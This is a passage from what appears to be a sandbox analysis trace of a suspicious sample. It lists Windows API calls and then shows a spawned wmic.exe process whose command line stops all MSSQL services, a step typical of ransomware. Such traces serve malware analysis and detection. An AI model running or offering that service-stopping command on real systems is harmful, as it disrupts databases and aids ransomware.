HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x38b860 | out: hHeap=0x370000) returned 1 [0203.194] GetProcessHeap () returned 0x370000 [0203.194] GetProcessHeap () returned 0x370000 [0203.194] HeapValidate (hHeap=0x370000, dwFlags=0x0, lpMem=0x38b6e0) returned 1 [0203.194] GetProcessHeap () returned 0x370000 [0203.194] RtlSizeHeap (HeapHandle=0x370000, Flags=0x0, MemoryPointer=0x38b6e0) returned 0x18 [0203.194] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x38b6e0 | out: hHeap=0x370000) returned 1 [0203.194] GetProcessHeap () returned 0x370000 [0203.194] GetProcessHeap () returned 0x370000 [0203.194] HeapValidate (hHeap=0x370000, dwFlags=0x0, lpMem=0x385be0) returned 1 [0203.194] GetProcessHeap () returned 0x370000 [0203.194] RtlSizeHeap (HeapHandle=0x370000, Flags=0x0, MemoryPointer=0x385be0) returned 0x20 [0203.194] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x385be0 | out: hHeap=0x370000) returned 1 [0203.194] GetProcessHeap () returned 0x370000 [0203.194] GetProcessHeap () returned 0x370000 [0203.194] HeapValidate (hHeap=0x370000, dwFlags=0x0, lpMem=0x385c70) returned 1 [0203.194] GetProcessHeap () returned 0x370000 [0203.194] RtlSizeHeap (HeapHandle=0x370000, Flags=0x0, MemoryPointer=0x385c70) returned 0x1e [0203.194] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x385c70 | out: hHeap=0x370000) returned 1 [0203.194] GetProcessHeap () returned 0x370000 [0203.194] GetProcessHeap () returned 0x370000 [0203.194] HeapValidate (hHeap=0x370000, dwFlags=0x0, lpMem=0x38b6c0) returned 1 [0203.194] GetProcessHeap () returned 0x370000 [0203.194] RtlSizeHeap (HeapHandle=0x370000, Flags=0x0, MemoryPointer=0x38b6c0) returned 0x18 [0203.194] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x38b6c0 | out: hHeap=0x370000) returned 1 [0203.195] GetProcessHeap () returned 0x370000 [0203.195] GetProcessHeap () returned 0x370000 [0203.195] HeapValidate (hHeap=0x370000, dwFlags=0x0, lpMem=0x385bb0) returned 1 [0203.195] GetProcessHeap () returned 0x370000 [0203.195] RtlSizeHeap (HeapHandle=0x370000, Flags=0x0, MemoryPointer=0x385bb0) returned 0x20 [0203.195] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x385bb0 | out: hHeap=0x370000) returned 1 [0203.195] GetProcessHeap () returned 0x370000 [0203.195] GetProcessHeap () returned 0x370000 [0203.195] HeapValidate (hHeap=0x370000, dwFlags=0x0, lpMem=0x38b990) returned 1 [0203.195] GetProcessHeap () returned 0x370000 [0203.195] RtlSizeHeap (HeapHandle=0x370000, Flags=0x0, MemoryPointer=0x38b990) returned 0x50 [0203.195] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x38b990 | out: hHeap=0x370000) returned 1 [0203.195] GetProcessHeap () returned 0x370000 [0203.195] GetProcessHeap () returned 0x370000 [0203.195] HeapValidate (hHeap=0x370000, dwFlags=0x0, lpMem=0x385a00) returned 1 [0203.195] GetProcessHeap () returned 0x370000 [0203.195] RtlSizeHeap (HeapHandle=0x370000, Flags=0x0, MemoryPointer=0x385a00) returned 0x20 [0203.195] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x385a00 | out: hHeap=0x370000) returned 1 [0203.195] GetProcessHeap () returned 0x370000 [0203.195] GetProcessHeap () returned 0x370000 [0203.195] HeapValidate (hHeap=0x370000, dwFlags=0x0, lpMem=0x385a30) returned 1 [0203.195] GetProcessHeap () returned 0x370000 [0203.195] RtlSizeHeap (HeapHandle=0x370000, Flags=0x0, MemoryPointer=0x385a30) returned 0x20 [0203.195] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x385a30 | out: hHeap=0x370000) returned 1 [0203.195] GetProcessHeap () returned 0x370000 [0203.195] GetProcessHeap () returned 0x370000 [0203.195] HeapValidate (hHeap=0x370000, dwFlags=0x0, lpMem=0x385a60) returned 1 [0203.195] GetProcessHeap () returned 0x370000 [0203.195] RtlSizeHeap (HeapHandle=0x370000, Flags=0x0, MemoryPointer=0x385a60) returned 0x20 [0203.195] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x385a60 | out: hHeap=0x370000) returned 1 [0203.195] GetProcessHeap () returned 0x370000 [0203.196] GetProcessHeap () returned 0x370000 [0203.196] HeapValidate (hHeap=0x370000, dwFlags=0x0, lpMem=0x385a90) returned 1 [0203.196] GetProcessHeap () returned 0x370000 [0203.196] RtlSizeHeap (HeapHandle=0x370000, Flags=0x0, MemoryPointer=0x385a90) returned 0x20 [0203.196] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x385a90 | out: hHeap=0x370000) returned 1 [0203.196] GetProcessHeap () returned 0x370000 [0203.196] GetProcessHeap () returned 0x370000 [0203.196] HeapValidate (hHeap=0x370000, dwFlags=0x0, lpMem=0x38b660) returned 1 [0203.196] GetProcessHeap () returned 0x370000 [0203.196] RtlSizeHeap (HeapHandle=0x370000, Flags=0x0, MemoryPointer=0x38b660) returned 0x18 [0203.196] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x38b660 | out: hHeap=0x370000) returned 1 [0203.196] GetProcessHeap () returned 0x370000 [0203.196] GetProcessHeap () returned 0x370000 [0203.196] HeapValidate (hHeap=0x370000, dwFlags=0x0, lpMem=0x385ac0) returned 1 [0203.196] GetProcessHeap () returned 0x370000 [0203.196] RtlSizeHeap (HeapHandle=0x370000, Flags=0x0, MemoryPointer=0x385ac0) returned 0x20 [0203.196] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x385ac0 | out: hHeap=0x370000) returned 1 [0203.196] GetProcessHeap () returned 0x370000 [0203.196] GetProcessHeap () returned 0x370000 [0203.196] HeapValidate (hHeap=0x370000, dwFlags=0x0, lpMem=0x385af0) returned 1 [0203.196] GetProcessHeap () returned 0x370000 [0203.196] RtlSizeHeap (HeapHandle=0x370000, Flags=0x0, MemoryPointer=0x385af0) returned 0x20 [0203.196] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x385af0 | out: hHeap=0x370000) returned 1 [0203.196] GetProcessHeap () returned 0x370000 [0203.196] GetProcessHeap () returned 0x370000 [0203.196] HeapValidate (hHeap=0x370000, dwFlags=0x0, lpMem=0x385b20) returned 1 [0203.196] GetProcessHeap () returned 0x370000 [0203.196] RtlSizeHeap (HeapHandle=0x370000, Flags=0x0, MemoryPointer=0x385b20) returned 0x20 [0203.196] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x385b20 | out: hHeap=0x370000) returned 1 [0203.196] GetProcessHeap () returned 0x370000 [0203.196] GetProcessHeap () returned 0x370000 [0203.197] HeapValidate (hHeap=0x370000, dwFlags=0x0, lpMem=0x385b50) returned 1 [0203.197] GetProcessHeap () returned 0x370000 [0203.197] RtlSizeHeap (HeapHandle=0x370000, Flags=0x0, MemoryPointer=0x385b50) returned 0x20 [0203.197] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x385b50 | out: hHeap=0x370000) returned 1 [0203.197] GetProcessHeap () returned 0x370000 [0203.197] GetProcessHeap () returned 0x370000 [0203.197] HeapValidate (hHeap=0x370000, dwFlags=0x0, lpMem=0x38b680) returned 1 [0203.197] GetProcessHeap () returned 0x370000 [0203.197] RtlSizeHeap (HeapHandle=0x370000, Flags=0x0, MemoryPointer=0x38b680) returned 0x18 [0203.197] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x38b680 | out: hHeap=0x370000) returned 1 [0203.197] GetProcessHeap () returned 0x370000 [0203.197] GetProcessHeap () returned 0x370000 [0203.197] HeapValidate (hHeap=0x370000, dwFlags=0x0, lpMem=0x385b80) returned 1 [0203.197] GetProcessHeap () returned 0x370000 [0203.197] RtlSizeHeap (HeapHandle=0x370000, Flags=0x0, MemoryPointer=0x385b80) returned 0x20 [0203.197] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x385b80 | out: hHeap=0x370000) returned 1 [0203.197] GetProcessHeap () returned 0x370000 [0203.197] GetProcessHeap () returned 0x370000 [0203.197] HeapValidate (hHeap=0x370000, dwFlags=0x0, lpMem=0x385c10) returned 1 [0203.197] GetProcessHeap () returned 0x370000 [0203.197] RtlSizeHeap (HeapHandle=0x370000, Flags=0x0, MemoryPointer=0x385c10) returned 0x20 [0203.197] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x385c10 | out: hHeap=0x370000) returned 1 [0203.197] GetProcessHeap () returned 0x370000 [0203.197] GetProcessHeap () returned 0x370000 [0203.197] HeapValidate (hHeap=0x370000, dwFlags=0x0, lpMem=0x38b6a0) returned 1 [0203.197] GetProcessHeap () returned 0x370000 [0203.197] RtlSizeHeap (HeapHandle=0x370000, Flags=0x0, MemoryPointer=0x38b6a0) returned 0x18 [0203.197] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x38b6a0 | out: hHeap=0x370000) returned 1 [0203.197] GetProcessHeap () returned 0x370000 [0203.197] GetProcessHeap () returned 0x370000 [0203.197] HeapValidate (hHeap=0x370000, dwFlags=0x0, lpMem=0x385c40) returned 1 [0203.198] GetProcessHeap () returned 0x370000 [0203.198] RtlSizeHeap (HeapHandle=0x370000, Flags=0x0, MemoryPointer=0x385c40) returned 0x20 [0203.198] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x385c40 | out: hHeap=0x370000) returned 1 [0203.198] GetProcessHeap () returned 0x370000 [0203.198] GetProcessHeap () returned 0x370000 [0203.198] HeapValidate (hHeap=0x370000, dwFlags=0x0, lpMem=0x38b620) returned 1 [0203.198] GetProcessHeap () returned 0x370000 [0203.198] RtlSizeHeap (HeapHandle=0x370000, Flags=0x0, MemoryPointer=0x38b620) returned 0x18 [0203.198] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x38b620 | out: hHeap=0x370000) returned 1 [0203.198] exit (_Code=0) Process: id = "15" image_name = "wmic.exe" filename = "c:\\windows\\system32\\wbem\\wmic.exe" page_root = "0x3e293000" os_pid = "0x6ec" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0xa08" cmd_line = "\"C:\\Windows\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%MSSQL%%'\" call stopservice" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 150 os_tid = 0x2ac [0203.697] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24f970 | out: lpSystemTimeAsFileTime=0x24f970*(dwLowDateTime=0xda9284b0, dwHighDateTime=0x1d62524)) [0203.697] GetCurrentProcessId () returned 0x6ec [0203.697] GetCurrentThreadId () returned 0x2ac [0203.697] GetTickCount () returned 0x1166bfd [0203.697] QueryPerformanceCounter (in: lpPerformanceCount=0x24f978 | out: lpPerformanceCount=0x24f978*=32403977868) returned 1 [0203.699] GetModuleHandleW (lpModuleName=0x0) returned 0xff150000 [0203.699] __set_app_type (_Type=0x1) [0203.699] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff19ced0) returned 0x0 [0203.699] __wgetmainargs (in: _Argc=0xff1c2380, _Argv=0xff1c2390, _Env=0xff1c2388, _DoWildCard=0, _StartInfo=0xff1c239c | out: _Argc=0xff1c2380, _Argv=0xff1c2390, _Env=0xff1c2388) returned 0 [0203.700] ??0CHString@@QEAA@XZ () returned 0xff1c2ab0 [0203.700] malloc (_Size=0x30) returned 0x365a80 [0203.700] malloc (_Size=0x70) returned 0x367d90 [0203.700] malloc (_Size=0x50) returned 0x365ac0 [0203.700] malloc (_Size=0x30) returned 0x367e10 [0203.700] malloc (_Size=0x48) returned 0x367e50 [0203.700] malloc (_Size=0x30) returned 0x367ea0 [0203.700] malloc (_Size=0x30) returned 0x367ee0 [0203.700] ??0CHString@@QEAA@XZ () returned 0xff1c2f58 [0203.700] malloc (_Size=0x30) returned 0x367f20 [0203.700] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4af482c [0203.701] SetConsoleCtrlHandler (HandlerRoutine=0xff195724, Add=1) returned 1 [0203.701] _onexit (_Func=0xff1af378) returned 0xff1af378 [0203.701] _onexit (_Func=0xff1af490) returned 0xff1af490 [0203.701] _onexit (_Func=0xff1af4d0) returned 0xff1af4d0 [0203.701] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0203.701] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0203.706] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0203.936] CoCreateInstance (in: rclsid=0xff1573a0*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff157370*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xff1c2940 | out: ppv=0xff1c2940*=0x1e41390) returned 0x0 [0203.946] GetCurrentProcess () returned 0xffffffffffffffff [0203.946] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x28, TokenHandle=0x24f740 | out: TokenHandle=0x24f740*=0xf4) returned 1 [0203.946] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x24f738 | out: TokenInformation=0x0, ReturnLength=0x24f738) returned 0 [0203.946] malloc (_Size=0x118) returned 0x366970 [0203.946] GetTokenInformation (in: TokenHandle=0xf4, TokenInformationClass=0x3, TokenInformation=0x366970, TokenInformationLength=0x118, ReturnLength=0x24f738 | out: TokenInformation=0x366970, ReturnLength=0x24f738) returned 1 [0203.946] AdjustTokenPrivileges (in: TokenHandle=0xf4, DisableAllPrivileges=0, NewState=0x366970*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x9), (Luid.LowPart=0x2, Luid.HighPart=10, Attributes=0x0), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0xd), (Luid.LowPart=0x2, Luid.HighPart=14, Attributes=0x0), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x12), (Luid.LowPart=0x2, Luid.HighPart=19, Attributes=0x0), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x17), (Luid.LowPart=0x3, Luid.HighPart=24, Attributes=0x0), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x1d), (Luid.LowPart=0x3, Luid.HighPart=30, Attributes=0x0), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x0, Luid.HighPart=2, Attributes=0x23), (Luid.LowPart=0x2, Luid.HighPart=1098290349, Attributes=0xd231), (Luid.LowPart=0x0, Luid.HighPart=3571552, Attributes=0x0), (Luid.LowPart=0x690057, Luid.HighPart=6553710, Attributes=0x77006f), (Luid.LowPart=0x790053, Luid.HighPart=7602291, Attributes=0x6d0065), (Luid.LowPart=0x57005c, Luid.HighPart=7209065, Attributes=0x6f0064), (Luid.LowPart=0x6f0050, Luid.HighPart=6619255, Attributes=0x530072))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0203.946] free (_Block=0x366970) [0203.946] CloseHandle (hObject=0xf4) returned 1 [0203.947] malloc (_Size=0x40) returned 0x367f60 [0203.947] malloc (_Size=0x40) returned 0x366970 [0203.947] malloc (_Size=0x40) returned 0x3669c0 [0203.947] malloc (_Size=0x20a) returned 0x366a10 [0203.947] GetSystemDirectoryW (in: lpBuffer=0x366a10, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0203.947] free (_Block=0x366a10) [0203.947] malloc (_Size=0x18) returned 0x367fb0 [0203.947] malloc (_Size=0x18) returned 0x366a10 [0203.947] malloc (_Size=0x18) returned 0x366a30 [0203.947] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0203.947] SysStringLen (param_1="\\kernel32.dll") returned 0xd [0203.947] free (_Block=0x367fb0) [0203.947] free (_Block=0x366a10) [0203.947] LoadLibraryW (lpLibFileName="C:\\Windows\\system32\\kernel32.dll") returned 0x77940000 [0203.947] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0203.947] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0203.948] FreeLibrary (hLibModule=0x77940000) returned 1 [0203.948] free (_Block=0x366a30) [0203.948] _vsnwprintf (in: _Buffer=0x3669c0, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x24f368 | out: _Buffer="ms_409") returned 6 [0203.948] malloc (_Size=0x20) returned 0x366a10 [0203.948] GetComputerNameW (in: lpBuffer=0x366a10, nSize=0x24f740 | out: lpBuffer="XDUWTFONO", nSize=0x24f740) returned 1 [0203.948] lstrlenW (lpString="XDUWTFONO") returned 9 [0203.948] malloc (_Size=0x14) returned 0x367fb0 [0203.948] lstrlenW (lpString="XDUWTFONO") returned 9 [0203.948] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x24f738 | out: lpNameBuffer=0x0, nSize=0x24f738) returned 0x7fffffde000 [0203.950] GetLastError () returned 0xea [0203.950] malloc (_Size=0x40) returned 0x366a40 [0203.950] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x366a40, nSize=0x24f738 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x24f738) returned 0x1 [0203.950] lstrlenW (lpString="") returned 0 [0203.950] lstrlenW (lpString="XDUWTFONO") returned 9 [0203.950] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="", cchCount2=0) returned 3 [0203.952] lstrlenW (lpString=".") returned 1 [0203.952] lstrlenW (lpString="XDUWTFONO") returned 9 [0203.952] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2=".", cchCount2=1) returned 3 [0203.952] lstrlenW (lpString="LOCALHOST") returned 9 [0203.952] lstrlenW (lpString="XDUWTFONO") returned 9 [0203.952] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="LOCALHOST", cchCount2=9) returned 3 [0203.952] lstrlenW (lpString="XDUWTFONO") returned 9 [0203.953] lstrlenW (lpString="XDUWTFONO") returned 9 [0203.953] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XDUWTFONO", cchCount1=9, lpString2="XDUWTFONO", cchCount2=9) returned 2 [0203.953] free (_Block=0x367fb0) [0203.953] lstrlenW (lpString="XDUWTFONO") returned 9 [0203.953] malloc (_Size=0x14) returned 0x367fb0 [0203.953] lstrlenW (lpString="XDUWTFONO") returned 9 [0203.953] lstrlenW (lpString="XDUWTFONO") returned 9 [0203.953] malloc (_Size=0x14) returned 0x366a90 [0203.953] lstrlenW (lpString="XDUWTFONO") returned 9 [0203.953] malloc (_Size=0x8) returned 0x366ab0 [0203.953] malloc (_Size=0x18) returned 0x366ad0 [0203.953] malloc (_Size=0x30) returned 0x366af0 [0203.953] malloc (_Size=0x18) returned 0x366b30 [0203.953] SysStringLen (param_1="IDENTIFY") returned 0x8 [0203.953] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0203.953] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0203.953] SysStringLen (param_1="IDENTIFY") returned 0x8 [0203.953] malloc (_Size=0x30) returned 0x366b50 [0203.953] malloc (_Size=0x18) returned 0x366b90 [0203.953] SysStringLen (param_1="IMPERSONATE") returned 0xb [0203.953] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0203.953] SysStringLen (param_1="IMPERSONATE") returned 0xb [0203.953] SysStringLen (param_1="IDENTIFY") returned 0x8 [0203.953] SysStringLen (param_1="IDENTIFY") returned 0x8 [0203.953] SysStringLen (param_1="IMPERSONATE") returned 0xb [0203.954] malloc (_Size=0x30) returned 0x366bb0 [0203.954] malloc (_Size=0x18) returned 0x366bf0 [0203.954] SysStringLen (param_1="DELEGATE") returned 0x8 [0203.954] SysStringLen (param_1="IDENTIFY") returned 0x8 [0203.954] SysStringLen (param_1="DELEGATE") returned 0x8 [0203.954] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0203.954] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0203.954] SysStringLen (param_1="DELEGATE") returned 0x8 [0203.954] malloc (_Size=0x30) returned 0x366c10 [0203.954] malloc (_Size=0x18) returned 0x366c50 [0203.954] malloc (_Size=0x30) returned 0x366c70 [0203.954] malloc (_Size=0x18) returned 0x366cb0 [0203.954] SysStringLen (param_1="NONE") returned 0x4 [0203.954] SysStringLen (param_1="DEFAULT") returned 0x7 [0203.954] SysStringLen (param_1="DEFAULT") returned 0x7 [0203.954] SysStringLen (param_1="NONE") returned 0x4 [0203.954] malloc (_Size=0x30) returned 0x366cd0 [0203.954] malloc (_Size=0x18) returned 0x366d10 [0203.954] SysStringLen (param_1="CONNECT") returned 0x7 [0203.954] SysStringLen (param_1="DEFAULT") returned 0x7 [0203.954] malloc (_Size=0x30) returned 0x366d30 [0203.954] malloc (_Size=0x18) returned 0x366d70 [0203.954] SysStringLen (param_1="CALL") returned 0x4 [0203.954] SysStringLen (param_1="DEFAULT") returned 0x7 [0203.954] SysStringLen (param_1="CALL") returned 0x4 [0203.954] SysStringLen (param_1="CONNECT") returned 0x7 [0203.954] malloc (_Size=0x30) returned 0x366d90 [0203.954] malloc (_Size=0x18) returned 0x366dd0 [0203.954] SysStringLen (param_1="PKT") returned 0x3 [0203.955] SysStringLen (param_1="DEFAULT") returned 0x7 [0203.955] SysStringLen (param_1="PKT") returned 0x3 [0203.955] SysStringLen (param_1="NONE") returned 0x4 [0203.955] SysStringLen (param_1="NONE") returned 0x4 [0203.955] SysStringLen (param_1="PKT") returned 0x3 [0203.955] malloc (_Size=0x30) returned 0x366df0 [0203.955] malloc (_Size=0x18) returned 0x366e30 [0203.955] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0203.955] SysStringLen (param_1="DEFAULT") returned 0x7 [0203.955] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0203.955] SysStringLen (param_1="NONE") returned 0x4 [0203.955] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0203.955] SysStringLen (param_1="PKT") returned 0x3 [0203.955] SysStringLen (param_1="PKT") returned 0x3 [0203.955] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0203.955] malloc (_Size=0x30) returned 0x368000 [0203.955] malloc (_Size=0x18) returned 0x366e50 [0203.956] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0203.956] SysStringLen (param_1="DEFAULT") returned 0x7 [0203.956] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0203.956] SysStringLen (param_1="PKT") returned 0x3 [0203.956] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0203.956] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0203.956] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0203.956] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0203.956] malloc (_Size=0x30) returned 0x368040 [0203.956] malloc (_Size=0x40) returned 0x366e70 [0203.956] malloc (_Size=0x20a) returned 0x366ec0 [0203.956] GetSystemDirectoryW (in: lpBuffer=0x366ec0, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0203.956] free (_Block=0x366ec0) [0203.956] malloc (_Size=0x18) returned 0x366ec0 [0203.956] malloc (_Size=0x18) returned 0x366ee0 [0203.956] malloc (_Size=0x18) returned 0x366f00 [0203.956] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0203.956] SysStringLen (param_1="\\wbem\\") returned 0x6 [0203.956] free (_Block=0x366ec0) [0203.956] free (_Block=0x366ee0) [0203.956] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0203.957] free (_Block=0x366f00) [0203.957] malloc (_Size=0x18) returned 0x366ec0 [0203.957] malloc (_Size=0x18) returned 0x366ee0 [0203.957] malloc (_Size=0x18) returned 0x366f00 [0203.957] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0203.957] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0203.957] free (_Block=0x366ec0) [0203.957] free (_Block=0x366ee0) [0203.957] GetCurrentThreadId () returned 0x2ac [0203.957] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x24f040 | out: phkResult=0x24f040*=0xf8) returned 0x0 [0203.957] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x24f090, lpcbData=0x24f030*=0x400 | out: lpType=0x0, lpData=0x24f090*=0x30, lpcbData=0x24f030*=0x4) returned 0x0 [0203.957] _wcsicmp (_String1="0", _String2="1") returned -1 [0203.957] _wcsicmp (_String1="0", _String2="2") returned -2 [0203.957] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x24f030*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x24f030*=0x42) returned 0x0 [0203.957] malloc (_Size=0x86) returned 0x366f20 [0203.957] RegQueryValueExW (in: hKey=0xf8, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x366f20, lpcbData=0x24f030*=0x42 | out: lpType=0x0, lpData=0x366f20*=0x25, lpcbData=0x24f030*=0x42) returned 0x0 [0203.957] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0203.957] malloc (_Size=0x42) returned 0x366fb0 [0203.957] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0203.957] RegQueryValueExW (in: hKey=0xf8, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x24f090, lpcbData=0x24f030*=0x400 | out: lpType=0x0, lpData=0x24f090*=0x36, lpcbData=0x24f030*=0xc) returned 0x0 [0203.957] _wtol (_String="65536") returned 65536 [0203.958] free (_Block=0x366f20) [0203.958] RegCloseKey (hKey=0x0) returned 0x6 [0203.958] CoCreateInstance (in: rclsid=0xff157410*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xff1573f0*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x24f538 | out: ppv=0x24f538*=0x22e71d0) returned 0x0 [0204.028] FreeThreadedDOMDocument:IXMLDOMDocument:load (in: This=0x22e71d0, xmlSource=0x24f680*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x366ec0), isSuccessful=0x24f6f0 | out: isSuccessful=0x24f6f0*=0xffff) returned 0x0 [0205.144] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x22e71d0, DOMElement=0x24f530 | out: DOMElement=0x24f530*=0x22ebc50) returned 0x0 [0205.145] malloc (_Size=0x18) returned 0x366ec0 [0205.145] IXMLDOMElement:getElementsByTagName (in: This=0x22ebc50, tagName="XSLFORMAT", resultList=0x24f540 | out: resultList=0x24f540*=0x22e9cc0) returned 0x0 [0205.146] free (_Block=0x366ec0) [0205.146] IXMLDOMNodeList:get_length (in: This=0x22e9cc0, listLength=0x24f708 | out: listLength=0x24f708*=21) returned 0x0 [0205.147] IXMLDOMNodeList:get_item (in: This=0x22e9cc0, index=0, listItem=0x24f510 | out: listItem=0x24f510*=0x22ebd50) returned 0x0 [0205.147] IXMLDOMNode:get_text (in: This=0x22ebd50, text=0x24f520 | out: text=0x24f520*="texttable.xsl") returned 0x0 [0205.147] IXMLDOMNode:get_attributes (in: This=0x22ebd50, 